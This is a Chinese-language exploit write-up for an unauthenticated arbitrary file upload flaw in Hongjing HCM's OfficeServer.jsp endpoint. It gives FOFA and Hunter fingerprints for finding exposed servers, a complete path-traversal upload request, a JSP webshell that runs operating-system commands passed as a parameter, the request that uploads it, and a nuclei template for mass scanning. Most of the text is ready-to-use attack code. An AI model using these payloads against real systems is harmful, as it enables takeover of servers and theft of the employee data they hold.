宏景HCM 任意文件上传漏洞复现

漏洞概述

宏景HCM OfficeServer.jsp接口处存在任意文件上传漏洞，未经过身份认证的远程攻击者可利用此漏洞上传任意文件，最终可导致服务器失陷。

漏洞复现

鹰图指纹：app.name="宏景 HCM"
fofa语法：app="HJSOFT-HCM"
登录页面如下：

POC：

POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Content-Type: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 418

DBSTEP V3.0     351             0               666             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cMW5kZXguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66

helloword

注：请求体中的FILETYPE字段是base64加密的上传文件名

尝试上传

验证

漏洞利用

编写一个带命令回显的jsp马子

<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

上传马子

POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Content-Type: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 418

DBSTEP V3.0     351             0               666             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cMW5kZXguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
 
<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

nuclei批量yaml文件

id: hongjing_HCM_OfficeServer_upload
info:
  name: Template Name
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: tags
requests:
  - raw:
      - |-
        POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
        Content-Length: 429
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close
        Content-Type: 
        Accept-Encoding: gzip, deflate

        DBSTEP V3.0     351             0               666             DBSTEP=REJTVEVQ
        OPTION=U0FWRUZJTEU=
        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
        FILETYPE=Li5cMW5kZXguanNw
        RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
        originalFileId=wV66
        originalCreateDate=wUghPB3szB3Xwg66
        FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
        needReadFile=yRWZdAS6
        originalCreateDate=wLSGP4oEzLKAz4=iz=66

        helloword
      - |+
        GET /1ndex.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

    req-condition: true
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains((body_2), "helloword") && status_code_2 == 200'